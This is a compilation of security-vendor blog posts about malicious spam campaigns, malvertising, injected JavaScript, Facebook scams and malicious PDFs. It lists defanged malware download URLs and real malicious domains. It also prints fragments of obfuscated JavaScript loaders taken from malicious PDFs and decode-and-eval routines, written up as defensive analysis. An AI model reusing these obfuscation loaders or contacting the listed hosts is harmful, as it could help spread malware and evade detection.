Computer Security Articles

Malware distribution via email is far from dead.  While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again

After the bot herders took a brief Easter break, they are back to sending new waves of malicious spam. The first spam campaign was sent by the Cutwail botnet earlier this week. The email claims to be an invoice from Bobijou Inc. – an online jewellery brand. There is a chance that people might fall into this trap especially as it claims money on your credit card was involved. But take a closer look at the subject line: Successfull Order 3677718, that wrong spelling should easily alert you that this email is a scam.

Cutwail Spam Campaign

Another malicious spam campaign originating from the Donbot botnet that came in later this week. It uses a common, uncreative theme with subject line like, “my hot pic : )“, “my naked pic is attached“, etc.  The Donbot botnet’s spam output is on the rise and this is the first time we have seen it spreading malicious attachments.

Dontbot Spam Campaign

Both spam campaigns contain a zipped attachment which, once extracted, contains an executable file that downloads – surprise, surprise – Fake Antivirus:

In addition, this week we have been seeing more of the Asprox botnet’s “Spam from your Facebook account” campaign, that preys on peoples fears about the security of their Facebook accounts. This campaign first came out last year, illustrating that the bot herders behind Asprox often cycle their spam campaigns between UPS, DHL, FEDEX and iTunes Gift Certificate among others.

Recent Facebook spam campaign sent by Asprox

The attachment is a Trojan that aims to seed the Aprox bot executable in the infected host, which is then used for spamming purposes.

SMTP transaction of an Asprox’s process ASPIMGR.EXE

We have blogged about these types of threats many times before.  In a sense, it’s the same old stuff with slightly different social engineering. Be wary.

Earlier the other day, I was browsing through the Yahoo! PH site and the Yahoo! Purple Hunt 2.0 ad caught my attention.

Curious as I am, I clicked on the ad and surprisingly my browser downloaded a suspicious file named com.com.

Apparently this ad redirected me to a randomly generated URL similar to the following which, unfortunately, led to the malicious download:

• hxxp://want6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69
  c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b
  13b801ba978269fcda413f53e/960b0a2a/com.com
• hxxp://nose8.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c
  09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b
  13b801ba978269fcda413f53e/960b0a2a/com.com
• hxxp://letter6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c0
  9b8d3198b2797726789be0228c0f3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13
  b801ba978269fcda413f53e/785c08d8/com.com

Below is a screenshot of the file download dialog box:

The downloaded file is detected by Trend Micro as TSPY_PIRMINAY.A. Let’s see how the download took place.

Firstly, the download only happens once per browser, which means that the malvertisement may have used an IP and user agent filtering of some sort to prevent multiple downloads which would make it suspicious to the end user.

To be able to replicate the malware download from the compromised ad, we used a browser extension which spoofs browser user agents, instead of installing different browsers.

It appears that the advertisement is first redirected to the malware download before it finally brings the browser to the real advertisement page. The redirection follows this format for the download link:

http://{varying string}{random number}.{varying domain}/se/{constant string or guid}/com.com

We’d like to thank the guys over at Yahoo! Ad Security Ops for acting swiftly on our initial report, taking down the malvertisement so it could no longer harm unsuspecting users.

Facebook has expanded its range of service offerings, making the site so much more than a place where users can interact with one another. It has been said several times that Facebook is bound to replace email as a means of communication, as it provides a more convenient way for users to send messages.

This convenience, however, was also leveraged by cybercriminals in a recent spam run wherein users were urged to download an application called Facebook Messenger. This would supposedly make it easier for them to access messages sent to their Facebook accounts.

The attack starts with spammed messages that look like a Facebook notification. The email message alerts the users about a message that has been sent to their Facebook accounts. It tells the users to click a link to view the said message. Clicking the message, however, displays a download page for an application called Facebook Messenger.

The downloaded file named FacebookMessengerSetup.exe is malicious and detected as BKDR_QUEJOB.EVL. BKDR_QUEJOB.EVL opens TCP port 1098 to listen for commands sent by a malicious attacker. The nature of the commands may include updating the malicious file, downloading and executing other malicious files, and starting certain processes. It also queries the system for information such as installed antivirus products and OS version then sends the data it gathers to a certain SMTP.

More Attacks Targeting Facebook Users

It seems like cybercriminals have their eyes particularly set on Facebook users these days, as this is not the only attack we’ve seen in the past couple of days.

In another spam run, recipients were told that their Facebook passwords were unsafe and that they should open an attached document, which contains their new passwords and information on how they can further secure their accounts. Ironically, the said document was actually a malware detected as TROJ_DOFOIL.VI.

We’ve also seen similar attacks to previously reported ones, which exploit the Facebook Events feature. This time, however, the social engineering lure used was yet another popular Facebook feature-Credits.

Users were notified of a supposed glitch in Facebook’s system that could be fixed by simply following a set of given instructions. Similar to the technique used in the Facebook Stalker Tracker attack, users were told to copy a piece of code and to paste it into their Web browser. Executing the said script results in the creation of an event and in the invitation of the affected users’ contacts to the said event. The “event” contains spammy information such as links to the Canadian Pharmacy.

The script used to create the spam event is now detected as JS_OBFUS.PB.

Trend Micro product users are already protected from the above-mentioned threats through the Trend MicroT Smart Protection NetworkT. Facebook users need to be aware that such schemes, among others, are very rampant on the network. Extreme caution before clicking links is strongly advised. Users may check out our comprehensive report, Spam, Scams, and Other Social Media Threats for more information.

Additional text and further analysis by Dhan Praga and Harry Reynoso

Google has introduced a new feature for its Chrome browser that will display a warning if a user attempts to download a suspected malicious executable file.

The Chrome team are enhancing the implementation of their Safe Browsing API service to include downloaded files.

What is the Safe Browsing API?
The Safe Browsing API is an experimental API that enables client applications to check URLs against Google’s constantly updated blacklists of suspected phishing and malware pages. Your client application can use the API to download an encrypted table for local, client-side lookups of URLs that you would like to check.

The new feature will be integrated with Google Chrome and will display a warning if a user attempts to download a suspected malicious executable file:

This warning will be displayed for any download URL that matches the latest list of malicious websites published by the Safe Browsing API. By adding support for these known malware destinations they will reduce the number of infections for users using Chrome.

Today it was reported that Spotify, the popular streaming music service, displayed malicious ads to users of their Free version. The ads lead to websites that used the Blackhole Exploit Kit to infect users with the Windows Recovery fake AV application. Our Advanced Classification Engine has full coverage for the Blackhole kit and protected users proactively. The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24.

Malvertising is nothing new, we've seen it effect large websites in the past but this case is slightly different. In the past the malicious ads have been displayed as part of a website and viewed with the browser. In this case the malicious ad is actually displayed inside of the Spotify application, like in the picture below (note that the ad below is not malicious, it's just an example):

The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again.

Once the ad was displayed, the computer would connect to hxxp://uev1.co.cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains:

Again, it was enough for the ad to just be displayed in the Spotify application, the user didn't have to click on the ad or do anything else. One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit which is a packed version of TDSS:

• tuartma.in
• rappour.in
• findstiff.org
• searchcruel.org
• findclear.org
• replity.in
• searchgrubby.org
• demivee.in
• ripplig.in

Here's a screenshot of what the application looks like on the user's PC:

One interesting thing is that we have only seen reports from infected users in the UK. This could mean that the attack only targets UK users or it's just that we haven't received reports from users anywhere else. If you are outside of the UK and have been affected by this, please send us a note using the comments feature below.

UPDATE: We got a tweet from our friends at Avast who report this breakdown of users who have seen the malicious ad: Sweden 59%, 40% UK and 1% for other countries. Thanks Avast, appreciate the info!

Thanks to Adam Hiscocks for providing information and samples to us.

There is a large-scale malicious spam campaign going on currently.  The spam comes in a few different types, one of which imitates a Twitter notification.  The subjects of the spam varies, but sadly, many focus on the recent events in Japan.

The links, which you can see in the image above, or if you look at the raw HTML, are distinctive:

http://lowercase_gibberish.(com|org|net)/base64string

The links lead to a page hosting obfuscated malicious JavaScript, which seek to exploit a Java vulnerability. Our host was immediately compromised, botted (added to a botnet), and some not-so-subtle fake anti-virus malware was installed complete with scary desktop warning:

The spam is originating from one of the Cutwail spambot variants. We managed to get this template from Cutwail command and control traffic, which clearly shows the Twitter template being used.

We are still investigating the nature of the malicious landing page and subsequent infection.

With the rise in social networking, we have been seeing increased use of fake ‘notifications’ being used by spammers.  As ever, remain on guard, especially when it comes to Twitter ‘notifications’.

Interestingly, the home page does not contain malicious content, but rather the malicious JavaScript has been injected into one of the “.js” files used for searching the content of the website. If you look at the above screenshot, you will see small search box. The attack will be activated if you search on anything using this functionality. Below is a screenshot of the search page a user is redirected to:

The source code of this page contains various “.js” files. The “search.js” file is infected with malicious JavaScript code. Here is the source code of that file:

The malicious JavaScript code is inserted at the bottom of this “.js” file. Here is the malicious content:

There are six different malicious JavaScript snippets, each obfuscated in a different way, but all ultimately point to same malicious domain. Let’s investigate one of them:

The decoded script is shown below:

The above malicious code points to the malicious domain “gumblar.cn”, which was used by the Gumblar Trojan. Fortunately, the malicious domain has now been taken down.

Zscaler blocks the infected page (http://bangaloretelecom.com/search.js) rather than blocking whole website. This example illustrates how malicious content can be filtered out, while still allowing access to what is an otherwise legitimate site – an important approach, given the prevalence of malicious infections. Our recent posts highlight the fact that numerous popular Indian web sites are struggling with proper application security controls.

Umesh

In this blog post, I want to cover a specific type of code obfuscation and then demonstrate how to manually, step-by-step deobfuscate the code. There are many automated tools and methods for performing deobfuscation, but I feel it's important to get down to the attacker's level to gain a more intimate understanding of attackers and obfuscation algorithms. This understanding helps us create better signatures to identify malicious content with our Threatseeker Network. After all, the best way to protect yourself and others from attack is to understand your attacker so that you have a better chance at proactive protection. Now, on to an example of obfuscated attack code. 

It's important to note that sites that have this code are most likely legitimate sites that have fallen prey to malicious code injection. This means that the site has been compromised by an attacker. The attacker inserts malicious code onto the compromised site and the injected malicious code executes when visitors visit the site. The attack code can either be on the compromised site or on another site to which the injected code redirects the visitor. We can think of the injected site as a vehicle for getting the attack code to run on victim computers. Below is a screenshot of the injected code that we're going to study. 

Injected code on an innocent site: 

For most people who see this malicious code, their eyes go crossed and they have no idea what they are looking at. This is the attacker's intent. Attackers don't want anybody viewing the source of the page to recognize that their injected code is doing something bad. So our first step is to format this script code so that it's easier for our eyes and brains to handle. You'll want to grab the code, put it into your favorite text editor and format it so that it looks like actual code. When that's done, you should feel that the code is easier to read and much less intimidating to review. 

Here is the code copied from the source of the page and formatted: 

Now that the code is nicely formatted, we can see that there are a number of function definitions in the script. In each of the function definitions we can see a variable declared with a peculiar string of numbers in a specific pattern. We can also see that this variable seems to be followed by a for loop. The for loop attracts my eyes straight away. Typically, a for loop that follows a peculiar variable definition is a red flag for a deobfuscation routine. For the rest of this post, we'll focus on one of the function definitions. 

Here is the function definition we are going to work with: 

Looking at this function, there is further work that we can do to make things easier for our eyes and brains. First, notice that the variable names are random and not meaningful. This, again, is designed to throw us off from understanding what is going on. But we are tenacious and not about to give up. So the next thing to do is to review the variable names, including where and how they are used. If there are variables that are static throughout, then let's do simple search and replace for the variable names. In this case, we can do a search and replace for CcySlu=4 and vcN=5. 

We should also look for any places where function declarations are used in a similar way. For example function XKJepVPIJ(c) is simply returning the string representation for a character code that is passed in. So anywhere we see a call to XKJepVPIJ, we can replace it with String.fromCharCode. Finally, in this step let's perform any mathematical operations in the function, so that we are left with a single number instead of a series of numbers and operations that we would have to think about every time we come across them in a loop. 

Here's a look at the function after performing the above steps: 

This function still looks intimidating, but less so because we can now recognize that the for loop is going backwards instead of from 0 to the end of a string or array. This is probably another ploy to throw off static analysis. We also have static values to work with instead of randomized variable names, so we can begin to see simple math operations and simple function calls. With respect to function calls, I'm no javascript developer so I don't know and recognize all the javascript functions that I come across. In this case, I was unfamiliar with the parseInt function and that threw me for a bit of a curve at first. 

So I pulled out my local library card and hopped on my bike to do some research. Actually, that was a middle school flashback — I'm showing my age here! I simply did a Google search for the parseInt function to learn what it does. According to my research, parseInt basically gives me the decimal value of what is passed in. Because there is no second value passed into any use of parseInt in our function, the use of the parseInt function is not necessary. So we can remove the parseInt calls. After parseInt is removed, we can rename some of the random variable names to some friendlier looking names and we're left with some readable code to step through. 

This is the final resulting code. It's much easier to get my head around. I've also put a few comments inline: 

For those of you wishing to try and step through this: 

var string='122-2+166-2+153-3+165-3+158-2+164-0+167-1+124-0+167-1+163-1+164-0+111-1+
160-4+163-1+153-3+152-0+167-1+158-2+163-1+162-2+123-1+105-3+157-3+167-1+167-1+
164-0+120-4+112-0+112-0+165-3+'; 

Now that this first function has been decoded, remember that there were multiple function definitions in this script injection. You should begin to see a script redirection created by the injected code. This script redirects visitors to an attack site while they are visiting the original site, which was injected with the above obfuscated code. As you can see, there was a lot of work done to hide the intent of the injected code. This obfuscation work is an attempt to evade recognition and removal of the injected code from a legitimate site. By understanding the deobfuscation process, we can generate more generic signatures that will help identify variations of this script injection. 

Security Researcher: Chris Astacio

View full post on Security Labs

The BBC – 6 Music Web site has been injected with a malicious iframe, as have areas of the BBC 1Xtra radio station Web site.  At the time of writing this blog, the sites are still linking to an injected iframe.

Websense customers are protected with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

…(read more)

Malicious websites often aim to only attack end-users of computer systems, without revealing inner-workings to security researchers. Mike Wood, Threat Researcher at Sophos, described the defensive practices used by websites that distribute fake anti-virus tools. (Strangely, the article is no longer available on the Sophos website, though it is in their RSS feed.)

Mike Wood pointed out that malicious sites often perform the following checks before deciding to attack the visitor:

• Review the User-Agent header of the browser, only attacking certain browsers.
• Review the Referer header, only attacking victims who come from certain websites, most notably from Google.
• Use JavaScript to compute the destination of the redirection, hoping to fool some of the simpler crawlers or website mirroring tools
• Use a “nonce to only return the attack payload if the link is fetched immediately after being generated”
• Tack the visitor’s IP address, not attacking if the IP is on a “blacklist” or if it has already been attacked recently

There are other self-defensive measures as well… I recommend reading Mike Wood’s article for additional details regarding these tactics and for his recommendations how web surfers can turn these tactics to their advantage. (If the article reappears on the Sophos website.)

If you are a security researcher, here are some of the techniques that can help you bypass the self-defensive measures outlined above:

• Fake your browser’s headers to match the likely values that the malicious website expects. I showed the importance this in an earlier article and also demonstrated how to do this with wget and curl tools.
• Consider using a full browser, rather than a command line tool, to let your laboratory system be infected. I like capturing the infection into a PCAP file using a network sniffer and then examine the file with Jsunpack-n.
• When navigating a malicious website using a browser, send your traffic through a local proxy, such as Paros Proxy or Fiddler, so that you have full visibility into the traffic exchanged between the browser and the website.
• Consider using a honey client that can execute JavaScript, rather than merely running wget or curl commands. Jsunpack-n can do this. Recently-released PhoneyC seems to have this ability too, though I haven’t tried it yet.
• Proxy your traffic to conceal its origin. Tor is a common option for this; however, Mike Wood pointed out that attackers sometimes cloak their sites from such traffic. Having your own network of proxy servers that keep changing is hard, but may be useful for a large security research operation.

If you’re just starting to learn how to research malicious websites, you might like my list of free online tools for looking up potentially malicious websites. Just keep in mind that these tools might be affected by the self-defensive properties of the sites they investigate.

— Lenny Zeltser

Karanataka Vikas Grameena Bank is victim of an attack. The site is comprised by the injection of malicious obfuscated JavaScript.

Home page of kvgbank.com :

Obfuscated JavaScript :

Multilevel obfuscated JavaScript was used to infect the site. Ultimately, it required two levels of De-obfuscation to fully decode it.

Part of De-obfuscated JavaScript:

The purpose of such attacks is to redirect the victims browser to pull content from a malicious site. Attackers have learned that it is far more effective to simply infect already popular websites, rather than set up a separate malicious site and social engineer victims into visiting it. In this particular instance, the De-obfuscated code opens a pop-up box depending on user’s browser version. The link used now points to a parked domain but likely previously hosted malicious code.

Home Page of http://dldslauno.com/ld/ment/ :

Even though the malicious code is not delivered by above site, it is possible that the vulnerability that led to the attack has not yet been patched and further infection could occur, or in future the linked site may host malicious content. We have informed the bank about the infection.

Virustotal results shows 23 out of 43 AV’s vendors trigger on the kvg bank site.

Pradeep.

Attackers have been able to insert a malicious style tag and malicious JavaScript code at the bottom of the page in two separate locations. With the help of some JavaScript code and JavaScript DOM objects and properties, the attacker has injected his obfuscated malicious code. This code is difficult to decode with the help of tools like Malzilla or online services like jsunpack.org. This blog will explain how to decode such malicious hidden Iframes by properly reading the code step by step. Let’s start by formatting the code.

The above code contains one style sheet defined by “#c19”. After further inspection of the code, we determine that variable “WnmaQ” is defined with function “YYSXc()”. After that, there are 3 other variables defined, with 2 of them containing garbage or useless functions and then there is a call to the original function by accessing “Wnmaq.YYSXc()”. This means this code will call the function inside the first defined variable which is “Wnmaq”. Now let’s format that function and break the code into parts so that we can decode it step by step. Here is first part of the script,

The above “for()” loop will actually extract the array data from the style tag defined earlier. I have put some comments inside the image to better explain the components of the code. Initially, variable “q” is matched with elements corresponding to the style sheet rule with the help of the “.selectorText” property. If the loop matches the string”#c19” of the style sheet, the code will continue. The next variable “w”, actually retrieves the array from the style sheet rule with the help of the property “.style.backgroundImage”. Now, we finally have useful variables. At this point, we should test to ensure everything seems reasonable. Let’s create a simple “test.html” file and add only important variables, style sheet tags and code inside the HTML file. We will test what the variable “w” will contain after above code with the help of “alert()” function. The sample HTML file is shown below:

We have removed everything and added only those variables which we decoded earlier. We should get array values from style tag. Here is what the variable “w” will contain after running above file.

So, the second part of the script just retrieved values from style tag. This shows our analysis is on the right track. We will keep this “test.html” file as it is and will add more interesting code after additional analysis. Let’s look into next part of the main script:

The above code explains that variable “c” will contain string called “split” and variable “m” will contain array values separated by commas. The variable “k” will contain a value which will be the array length divided by 2. We will add all above 3 lines of code into our “test.html” file and will then alert the value of “k” for our purposes. The variable “k” will contain the value 90 if you run the modified “test.html” file. The above code also contains garbage code as mentioned earlier. Let’s decode the last part of the main script,

The above code is the last part of the main malicious script. Here we will finish the decoding of the code and will come to determine the main malicious code behind this. As analyzed earlier, variable “k” will contain value 90 and this “for()” loop will run 90 times. The function “parseInt()” is used to obtain the exact integer. The variable “o” will contain the month of the date object, which is 10. The variable “r” contains the string “fromCharCode”, which we found earlier. So finally variable “j” will look like,

j += String[“fromCharCode”][rZ];

The loop will continue and variable “j” will be appended with characters retrieved from above expression. This is the main code behind the entire script. The last variable “kW” contains the JavaScript function “eval()” and then there is call to this function with parameter “j”. This tells us that the malicious content will evaluate the code inside the variable “j”. Let’s add this “for()” loop inside our earlier “test.html” file and we will alert the value of “j” to find out the hidden code. This is what our final “test.html code will look like:

We have only added useful variables, loops and JavaScript code in the above file. We have removed useless variables and functions from the main script. Now here is what you see when you run the above file:

The malicious Iframe pointing to malicious domain is finally revealed. The attacker has created the malicious JavaScript code with the help of a style tag to generate a malicious Iframe. This process can be difficult to analyze and tools or services may fail due to the complex nature of the code and various tricks used by attacker. However, if you have a little patience and good eyes, it is very easy to decode such malicious JavaScript code by understanding the flow of the code. That’s it for now.

Happy Decoding

Umesh

A new malicious Facebook campaign comes with an extra added bonus — the chance to spread your very own scam.

Scams advertising applications such as “Profile Creeps” and “Creeper Tracker” are luring in Facebook users interested in finding out who is viewing their profiles.

“I just saw who STALKS me on Facebook! You can see who creeps around your profile too!” reads one of the scam messages.

This ploy has been seen several times; it works well because it’s a social engineering trick designed to play into people’s inherent curiosities and insecurities. But this one has an added element.

Users who fall for this trick are directed to a survey page, in which completed user surveys generate money for the scammers. After the survey is taken, the scammers turn the tables and offer the scam software directly to the victims.

For $25, the victim can purchase a toolkit called “Tinie app,” which includes step-by-step directions on how to virally spread your own Facebook scam.

“This phenomenon of template Facebook applications like Tinie app shows how the spamming culture is consolidating more and more around Facebook,” said the security firm Websense.

Putting the cybercrime tools in the hands of those who’ve been duped could have disastrous – or at the very least annoying — consequences.

It could, for example, allow fledgling Facebook hackers to infiltrate the accounts of five Missouri state representatives including Stacey Newman, Dave Schatz and Donna Lichtenegger, and post messages such as “I love lobbyist! All the free food and stuff you get. This job is awesome!” according to the security firm Sophos.

Lichtenegger admitted that on the day her account was taken over, she had been accessing Facebook via the Missouri State Capitol building’s free public Wi-Fi.

While Facebook’s newly released secure browsing option — in which users can access the site using an encrypted HTTPS connection — could have helped the legislators, Softpedia reports that the feature contains a bug that disables it whenever a non-secure app is called upon.

A newbie Facebook scammer with the $25 toolkit could also post a message claiming to have a video of a father catching his daughter stripping for a webcam.

The scam, which is currently spreading through Facebook, comes with a message that reads “OMG she is so busted!! Dad Catches Daughter on Webcam!” and includes a link to the supposed racy video, Sophos reported.

The link directs users instead to a rogue application that attempts to access users’ personal information and post the fake webcam message to their walls.

During last weekend a viral rogue app campaign hit Facebook again. This time the application was called "Profile Creeps" which, like many other rogue applications before it, promises to do what Facebook simply doesn't allow *ANY* app to do – let us know who looks at our profile. But users are still tricked into installing apps that promise to do just this. And just like most others, the latest one leads to a survey that in the end generates money for the people behind the app.

Viral Facebook Application Toolkits

Spam campaigns such as this one appear on an almost daily or weekly basis. You might ask yourself: is everybody now becoming a Facebook developer and trying to make tons of cash unleashing those annoying surveys? In essence, the answer is both a "yes" and a "no". No, not everybody is a Facebook developer, yes it's very easy to take on the experience and become one – or pretend to be one. You don't have to be a developer, but a mere $ 25 can buy you a Facebook viral application toolkit and unleash all the unwanted content you want onto Facebook. 

As an example, let's look at a very similar fraudulent application that "can" allow Facebook users to know who "creeps" at their profile, called "Facebook Profile Creeper Tracker Pro". The application asks for some permissions, shows an online survey/advertisements and tells the user at the end of the process that he/she is the one that looks at his/her own profile the most. In other words, this application should be revoked according to the terms and conditions of Facebook.

"Facebook Profile Creeper Tracker Pro" and similar fraudulent applications process:

This application was built with a pre-defined toolkit called "Tinie app" which is a Facebook viral application template available in some variations for only $ 25 or even less. The next image is one of the template images in the toolkit that aims to give some directions to the buyer, besides the full-blown step-by-step guide that comes with the kit itself:

The buyer doesn't have to have development experience with Facebook, he/she just needs to follow the accompanying instructions and a working viral Facebook application is at their disposal. One of the sellers of the application describes its purpose pretty well:

If you're wondering what CPA lead is, it's the abbreviation of Cost Per Action. It's a program that any Web content publisher can join that allows them to install a survey on their site in order to make money. The cut with those programs is around $ 0.20-$ 2.00 and could be more or less.

This phenomenon of template Facebook applications like Tinie app shows how the spamming culture is consolidating more and more around Facebook, adapting to the platform and increasing what we call Web spam.

To protect yourself from malicious URL links and spam posts being made to your Facebook wall, try our free Defensio Facebook app.  You can download it from Defensio.com.

Malicious PDF files and related exploits are invading the Net. Looking at the CVE records in the National Vulnerability Database for Adobe products, we see a dramatic increase in 2009.

Since January 1, Adobe vulnerabilities have continued to appear. During this period, five are classified as medium, while about 30 are judged high-level threats.

Now we find the Zeus botnet is also taking advantage of a PDF flaw: This vulnerability, along with about 15 others, are now covered by the recent patch (ABSB10-09).

In 2007 and at the beginning of 2008 most of the exploit samples in our malware collections were linked to HTML/iframe, WMF, or DCOM vulnerabilities.

Today malware involving malformed PDF file are legion. From less then 2 percent of malware directly connected to exploits in 2007 and 2008, they have reached 17 percent in 2009 and 28 percent during the first quarter of 2010. For Adobe Reader software, 2010 seems to be the year of living dangerously.

View full post on McAfee Avert Labs

A new malicious spam campaign underlines the security benefits of upgrading to the latest version of Adobe Reader – Adobe Reader X.

SophosLabs are currently seeing reports of a low-level attack, spamming out malicious PDF attachments. Sophos products detect the attack as Mal/PDFEx-J.

The dangerous attached files use filenames of the form DD-MM-YYYY-NN.pdf (in other words, a date with a two digit number attached).

The emails typically look like this:

Hello, [recipient email]

It was scanned and sent to you using Xerox WorkCentre Pro.
Please open the attached document.

Sent by: Guest
Number of Images: 1 Attachment
File Type: PDF.
WorkCentre Pro Location: Machine location not set

I took a look at one sample of this family of malware (sha1:ef175336502a0216b4d0830944bc36e8155e0475) in order to see what would happen if I opened it with different versions of Adobe Reader.

When opened by Adobe Reader 8, the PDF displayed nothing, but does attempts to download and run malicious code from a Colombian TLD.

However, when I opened the same file with Adobe Reader X no attack occurs and an error message is displayed:

Other variants (also detected as Troj/PDFJs-QB) link download and run a fake anti-virus attack that Sophos intercepts as Mal/FakeAV-EA.

The malicious code is stored within the Producer tag :

and accessed via the this.producer

var qweval=5;
for(var i in this) {
	if (i.indexOf('qwe') != -1) {
		jbka=this[i.replace('qw','')];
	}
}
jbka('cck=this.producer');
xswi=jbka(cck.substr(0,19));
...

Hiding code within other parts of PDF files isn’t a new trick and if you want to find out more about PDF threats then look at my earlier article: “PDF security under the microscope: A review of OMG-WTF-PDF”.

It appears that an update introduced in Adobe Reader X has broken a fundamental part of this threat. Well done Adobe!

For this reason, I would urge users and system administrators responsible for protecting firms to consider updating to Adobe Reader X as soon as possible.

Last year, my colleague Chet Wisniewski interviewed Adobe security chief Brad Arkin about all matters Adobe, including the then-upcoming Reader X. Take a listen below if you want to hear more about how Adobe is tackling security issues with its products.

(23 August 2010, duration 24:36 minutes, size 11.3MBytes)

You can also download this podcast directly in MP3 format: Chet Wisniewski interviews Adobe’s Brad Arkin. All of our past podcasts are available from http://podcasts.sophos.com and on iTunes.

Full story: Naked Security – Sophos

Here is another small trick that malicious PDFs use. The PDF contains
JavaScript code similar to the following:

var part1="pe";
var part2="Ty";
var part3="o";
var part4="get";
var part5="xOf";
var fun1= event["tar"+part4]["z"+part3+part3+"m"+part2+part1];
fun1 = varka_tipo[1]+"nde"+part5;
var fun2 = "fromCharCode";
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
    "abcdefghijklmnopqrstuvwxyz" +
    "0123456789"+
    "+/=";

function decode(input) {
    ...
    enc1 = keyStr[fun1](input.charAt(i++));
    ...
}

var code = decode("Q2!#$  %^&5a...#$  %^&o=!#$  %^&");
eval(code);

This script sets up some variables that are used in a decoding
routine. As usual, the routine decodes a long string and the
result is then interpreted via eval().

The interesting part is how fun1 is computed. Undoing the simple
obfuscation shows that it is initialized to event.target.zoomType.
Now, event.target is a reference to the Doc object. The Doc object’s
property zoomType contains the current zoom type of the document. The
documentation lists 7 possible values:

• NoVary
• FitPage
• FitWidth
• FitHeight
• FitVisibleWidth
• Preferred
• ReflowWidth

Adobe Reader seems to return FitWidth by default.
The next step in the script extracts the second character from the zoom
type string (the letter i) and concatenates to other strings to obtain
indexOf.

A long way to get an i…

Full story: Marco’s Blog

ICQ client used to push malicious ads that lead fake anti-virus.

Full story: Securelist / All Updates

Websense Security Labs™ ThreatSeeker™ Network has discovered a slew of New Year-themed malicious emails circulating today.  Websense customers are being protected proactively against this ongoing malicious spam campaign by ACE, our Advanced Classification Engine.

…(read more)

Full story: Security Labs

About a month ago I posted a blog describing research I was doing on malicious PDF files. As part of this research I needed a way to represent a malicious PDF file in a queryable form. I ultimately decided on MongoDB as my backend and therefore wanted to get the malicious file in a JSON form so I could store it.

The tool I just released today is a composite of tools from myself and Didier Stevens. Didier’s PDF tools have done a lot of the heavy lifting, but my glue code brings multiple pieces of data into a single object. As of right now the object contains the following details:

read more

Full story: Offensive Computing blogs

A stack-based buffer overflow vulnerability in Microsoft Office was recently discovered to have been actively exploited in the wild. Trend Micro now detects the exploit .RTF files as TROJ_ARTIEF.SM.

The malicious .RTF files have shell codes designed to overflow the stack and to cause Microsoft Word to crash. As a result, malicious users can execute arbitrary commands on an affected system.

From the screenshot above, we can see that the malware employed a (NOP) sled to overflow the buffer and to execute codes in the context of Microsoft Word. The malware we encountered dropped another malicious file detected as TROJ_INJECT.ART.

One of the more serious concerns is that a malicious user could send an RTF email to target users. Since Microsoft Outlook uses Word to handle email messages, the mere act of opening or viewing specially crafted messages in the reading pane may cause the exploit code to execute.

Microsoft already released an update to address the said vulnerability. Users are strongly advised to download and install the patch, which can be found in the official bulletin MS10-087. This was issued as part of November’s Patch Tuesday.

Post from: TrendLabs | Malware Blog – by Trend Micro

Malicious .RTF Files Exploit Microsoft Office Vulnerability

– Karl Dominguez (Threat Response Engineer) on TrendLabs | Malware Blog – by Trend Micro

n the last few days we have discovered that spam messages with malicious links are being sent via instant messenger services – on Securelist / All Updates

For the past few days I have been completely immersing myself in PDF research in hopes to find better ways to detect malicious PDF files. I have collected a pretty good random sample set (15K) of PDF data and have a bunch of malicious files with the same statistics. I have wrote some basic tools to aid in my research and it would be nice to get some input on the results I have found so far.

The outline of the project can be found here:

http://pdfxray.9bplus.com/

The blog with all the research, data and tools that have been released can be found here:

http://blog.9bplus.com

– x0ner on Offensive Computing blogs

New attack via Twitter is in progress – on Securelist / All Updates